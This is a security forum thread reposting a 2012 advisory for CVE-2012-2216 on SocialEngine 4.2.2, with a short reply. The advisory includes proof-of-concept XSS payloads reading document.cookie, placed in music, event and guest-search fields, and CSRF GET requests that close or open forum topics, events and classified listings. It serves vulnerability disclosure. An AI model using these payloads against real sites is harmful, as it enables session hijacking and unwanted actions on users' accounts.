查看: 9834|回复: 1

SocialEngine 4.2.2 Multiple Vulnerabilities

[复制链接]
  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-5-27 11:58:27 | 显示全部楼层 |阅读模式
    1. Social Engine 4.2.2 Multiples Vulnerabilities  

    2. Earlier versions are also possibly vulnerable.  

    3.    

    4. INFORMATION  

    5.    

    6. Product: Social Engine 4.2.2  

    7. Remote-Exploit: yes  

    8. Vendor-URL: [url]http://www.socialengine.net/[/url]  

    9. Discovered by: Tiago Natel de Moura aka "i4k"  

    10. Discovered at: 10/04/2012  

    11. CVE Notified: 10/04/2012  

    12. CVE Number: CVE-2012-2216  

    13.    

    14. OVERVIEW  

    15.    

    16. Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.  

    17.    

    18. INTRODUCTION  

    19.    

    20. SocialEngine is a PHP-based white-label social networking service  

    21. platform, that provides features similar to a social network on a user's  

    22. website. Main features include administration of small-to-mid scale  

    23. social networks, some customization abilities, unencrypted code,  

    24. multilingual capability, and modular plugin/widget compatibility. There  

    25. is a range of templates and add-ons available to extend the basic  

    26. features already included in the SocialEngine core.  

    27.    

    28. VULNERABILITY DESCRIPTION  

    29.    

    30. == Persistent XSS in music upload. ==  

    31.    

    32. CWE-79: [url]http://cwe.mitre.org/data/definitions/79.html[/url]  

    33. The software does not neutralize or incorrectly neutralizes  

    34. user-controllable input before it is placed in output that is  

    35. used as a web page that is served to other users.  

    36.    

    37. Proof Of Concept:  

    38. POST http://localhost/index.php/music/create  

    39.    

    40. POST data without form-data enctype:  

    41. title=<script>alert(document.cookie);</script>&description=teste  

    42. &search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=  

    43. &fancyuploadfileids=15  

    44.    

    45. == Persistent XSS in creating events ==  

    46.    

    47. POST  

    48. http://localhost/socialengine/socialengine422_trial/index.php/events/create  

    49.    

    50. POST data without form-data enctype:  

    51. title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&  

    52. starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012  

    53. &endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste  

    54. &location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&  

    55. photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&  

    56. auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=  

    57.    

    58. == Reflected XSS in search form of events area. ==  

    59.    

    60. Direct javascript injected:  

    61. POST http://localhost/index.php/widget/index/content_id/644  

    62.    

    63. format=html&subject=event_1&search=';alert(document.cookie);var a = '  

    64.    

    65. Proof of Concept:  

    66. - - Go to URL: /index.php/event/$EVENT_ID  

    67. - - Click on the "Guests"  

    68. - - Click in "Search guests" form  

    69. - - Submit: ';alert(document.cookie); var a = '  

    70.    

    71. You will see your PHPSESSID in the alert.  

    72.    

    73. == Multiples CSRF vulnerabilities ==  

    74.    

    75. CWE-352: [url]http://cwe.mitre.org/data/definitions/352.html[/url]  

    76. The web application does not, or can not, sufficiently verify whether  

    77. a well-formed, valid, consistent request was intentionally provided by  

    78. the user who submitted the request.  

    79.    

    80. A CSRF in the plugin "Forum" allows forcing the owner of the event to do  

    81. some  

    82. activities such as:  

    83.    

    84. Close a topic:  

    85. GET /index.php/forums/topic/4/example-topic/close/close/1  

    86.    

    87. Open a topic:  

    88. GET /index.php/forums/topic/4/example-topic/close/close/0  

    89.    

    90. A CSRF in the plugin "Event" allows forcing the owner of the event to do  

    91. some  

    92. activities such as:  

    93.    

    94. Close the event:  

    95. GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2  

    96.    

    97. Open the event:  

    98. GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2  

    99.    

    100. "Watch Topic":  

    101. GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2  

    102.    

    103. "Stop Watching Topic":  

    104. GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2  

    105.    

    106. A CSRF in the plugin "Classifieds" allows forcing the owner of the event  

    107. to do  

    108. some activities such as:  

    109.    

    110. Open the classified listing:  

    111. GET /index.php/classifieds/close/1/closed/0  

    112.    

    113. Close the classified listing:  

    114. GET /index.php/classifieds/close/1/closed/1  

    115.    

    116. VERSIONS AFFECTED  

    117.    

    118. Tested with version 4.2.2 but earlier versions are possibly vulnerable.  

    119.    

    120. SOLUTION  

    121.    

    122. Upgrade to Social Engine 4.2.4.  

    123.    

    124. NOTES  

    125.    

    126.    

    127. The Common Vulnerabilities and Exposures (CVE) project has assigned the  

    128. name CVE-2012-2216 to this issue. This is a candidate for inclusion in  

    129. the CVE list ([url]http://cve.mitre.org[/url]), which standardizes names for  

    130. security problems.  

    131. CREDITS  

    132.    

    133. Tiago Natel de Moura aka "i4k"  

    134. SEC+ Information Security Company - [url]http://www.secplus.com.br/[/url]  

    135. BugSec Security Team - [url]http://bugsec.googlecode.com/[/url]  

    136.    

    137. --   

    138. Tiago Natel de Moura  

    139. IT Security Consultant                        

    140. [url]http://www.linkedin.com/in/tiagonatel[/url]  

    141. [url]http://www.secplus.com.br/[/url]  

    142. [url]http://github.com/tiago4orion[/url]  

    143. [url]http://code.google.com/p/bugsec[/url]
    复制代码

    回复

    使用道具 举报

    该用户从未签到

    发表于 2012-5-29 22:24:18 | 显示全部楼层
    代码看不懂。
    小东,用来干嘛的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 17:36 , Processed in 0.022350 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部